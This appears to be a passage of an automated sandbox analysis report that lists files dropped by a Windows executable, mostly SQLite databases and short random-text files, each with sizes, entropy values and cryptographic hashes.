            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):0.8180424350137764
            Encrypted:false
            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
            MD5:349E6EB110E34A08924D92F6B334801D
            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):0.8180424350137764
            Encrypted:false
            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
            MD5:349E6EB110E34A08924D92F6B334801D
            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):0.8180424350137764
            Encrypted:false
            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
            MD5:349E6EB110E34A08924D92F6B334801D
            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):0.8180424350137764
            Encrypted:false
            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
            MD5:349E6EB110E34A08924D92F6B334801D
            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):49152
            Entropy (8bit):0.8180424350137764
            Encrypted:false
            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
            MD5:349E6EB110E34A08924D92F6B334801D
            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):114688
            Entropy (8bit):0.9746603542602881
            Encrypted:false
            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
            MD5:780853CDDEAEE8DE70F28A4B255A600B
            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
            Malicious:false
            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.705615236042988
            Encrypted:false
            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
            MD5:159C7BA9D193731A3AAE589183A63B3F
            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
            Malicious:false
            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.699434772658264
            Encrypted:false
            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
            MD5:02D3A9BE2018CD12945C5969F383EF4A
            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
            Malicious:false
            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.69156792375111
            Encrypted:false
            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
